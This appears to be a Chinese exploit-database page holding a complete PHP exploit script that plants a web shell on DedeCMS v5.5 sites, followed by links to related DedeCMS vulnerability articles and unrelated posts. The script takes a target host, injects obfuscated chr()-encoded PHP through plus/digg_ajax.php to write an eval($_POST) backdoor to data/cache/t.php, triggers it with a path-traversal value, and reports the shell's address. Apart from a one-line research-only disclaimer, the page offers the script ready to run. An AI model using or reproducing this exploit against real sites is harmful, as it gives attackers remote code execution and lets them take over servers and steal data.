测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. print_r('
    3. +----------------------------------------+
    4. dedecms v5.5 final getwebshell exploit
    5. +----------------------------------------+
    6. ');
    7. if($argc <3){
    8. print_r('
    9. +----------------------------------------+
    10. Usage: php '.$argv[0].' host path
    11. host: target server (ip/hostname)
    12. path: path to dedecms
    13. Example:
    14. php '.$argv[0].' localhost /dedecms/
    15. +----------------------------------------+
    16. ');
    17. exit;
    18. }
    19. error_reporting(7);
    20. ini_set('max_execution_time',0);
    21. $host = $argv[1];
    22. $path = $argv[2];
    23. $post_a ='plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
    24. $post_b ='needCode=aa/../../../data/mysql_error_trace';
    25. $shell ='data/cache/t.php';
    26. get_send($post_a);
    27. post_send('plus/comments_frame.php',$post_b);
    28. $content = post_send($shell,'t=echo tojen;');
    29. if(substr($content,9,3)=='200'){
    30. echo "\nShell Address is:".$host.$path.$shell;
    31. }else{
    32. echo "\nError.";
    33. }
    34. function get_send($url){
    35. global $host, $path;
    36. $message ="GET ".$path."$url HTTP/1.1\r\n";
    37. $message .="Accept: */*\r\n";
    38. $message .="Referer: http://$host$path\r\n";
    39. $message .="Accept-Language: zh-cn\r\n";
    40. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    41. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    42. $message .="Host: $host\r\n";
    43. $message .="Connection: Close\r\n\r\n";
    44. $fp = fsockopen($host,80);
    45. if(!$fp){
    46. echo "\nConnect to host Error";
    47. }
    48. fputs($fp, $message);
    49. $back ='';
    50. while(!feof($fp))
    51. $back .= fread($fp,1024);
    52. fclose($fp);
    53. return $back;
    54. }
    55. function post_send($url,$cmd){
    56. global $host, $path;
    57. $message ="POST ".$path."$url HTTP/1.1\r\n";
    58. $message .="Accept: */*\r\n";
    59. $message .="Referer: http://$host$path\r\n";
    60. $message .="Accept-Language: zh-cn\r\n";
    61. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    62. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    63. $message .="Host: $host\r\n";
    64. $message .="Content-Length: ".strlen($cmd)."\r\n";
    65. $message .="Connection: Close\r\n\r\n";
    66. $message .= $cmd;
    67. $fp = fsockopen($host,80);
    68. if(!$fp){
    69. echo "\nConnect to host Error";
    70. }
    71. fputs($fp, $message);
    72. $back ='';
    73. while(!feof($fp))
    74. $back .= fread($fp,1024);
    75. fclose($fp);
    76. return $back;
    77. }
    78. ?>

dedecms v5.5 final getwebshell exploit(datalistcp.class.php)的更多相关文章

  1. Dedecms <= V5.6 Final模板执行漏洞

    漏洞版本: Dedecms V5.6 Final 漏洞描述: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上 ...

  2. DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

    漏洞版本: DedeCms V5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为 ...

  3. 为dedecms v5.7的ckeditor添加jwplayer插件

    dedecms v5.7的默认编辑器是ckeditor,不过用的是php版本的,默认的工具栏不在config.js里面配置,而是在ckeditor.inc.php里面配置,默认的工具栏是$toolba ...

  4. Dedecms v5.7包含上传漏洞利用

    Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16 注册,登录,免邮箱验证. up.htm ---------------------------------- ...

  5. 织梦DedeCMS v5.7 实现导航条下拉菜单

    首先将下面这段代码贴到templets\default\footer.htm文件里(只要在此文件里就行,位置无所谓) <</span>script type='text/javasc ...

  6. CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞

    一.漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页: http://www.dedecms.com/软件链接: ht ...

  7. DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129)

    DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2版本中的 ...

  8. DedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)

    dedeCMS  V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2 ...

  9. DeDeCMS v5.7 漏洞复现

    DedeCMS V5.7 漏洞复现 XSS漏洞 首先我们在首页要进行用户的注册以及登录 这里我们已经提前注册过了,登录即可 普通用户账号密码:root/passwd 管理员账号密码:admin/pik ...

随机推荐

  1. Typecho-反序列化漏洞学习

    目录 Typecho-反序列化漏洞学习 0x00 前言 0x01 分析过程 0x02 调试 0x03 总结 0xFF 参考 Typecho-反序列化漏洞学习 0x00 前言 补丁: https://g ...

  2. bzoj 1224

    dfs + 剪枝, 用最大最小值剪. #include<bits/stdc++.h> #define LL long long #define fi first #define se se ...

  3. php源码审计

    转:http://www.jb51.net/article/31898.htm 针对PHP的网站主要存在下面几种攻击方式: 1.命令注入(Command Injection) 2.eval注入(Eva ...

  4. Python之路【第二篇】: 列表、元组、字符串、字典、集合

    本文内容: -------------------------------------- 列表.元组操作 字符串操作 字典操作 集合操作 文件操作 字符编码与转码 1. 列表(list) 序列是Pyt ...

  5. Java多线程编程——wait()和notify()、notifyAll()

    1.源码 wait() notify() notifyAll()都是Object类中方法.源码如下所示: public final native void notify(); public final ...

  6. Ubuntu下环境变量该写进哪个文件里

    Linux中环境变量包括系统级和用户级,系统级的环境变量是每个登录到系统的用户都要读取的系统变量,而用户级的环境变量则是该用户使用系统时加载的环境变量. 所以管理环境变量的文件也分为系统级和用户级的. ...

  7. 【HDU 6020】 MG loves apple (乱搞?)

    MG loves apple  Accepts: 20  Submissions: 693  Time Limit: 3000/1500 MS (Java/Others)  Memory Limit: ...

  8. 【BZOJ 3560】 3560: DZY Loves Math V (欧拉函数)

    3560: DZY Loves Math V Time Limit: 10 Sec  Memory Limit: 256 MBSubmit: 241  Solved: 133 Description ...

  9. 【期望DP】BZOJ2134- 单选错位

    [题目大意] 有n道题,第i道题有ai个选项.一个人把所有的正确答案填到了后面一题上(特殊的,当i=n的时候填到1上),问他期望做对几道题? [思路] 沙茶题……显然每道题的期望是独立的. 对于某道题 ...

  10. SpringMVC 常用注解 详解

    SpringMVC 常用注解 详解 SpringMVC 常用注解 1.@RequestMapping                                      路径映射 2.@Requ ...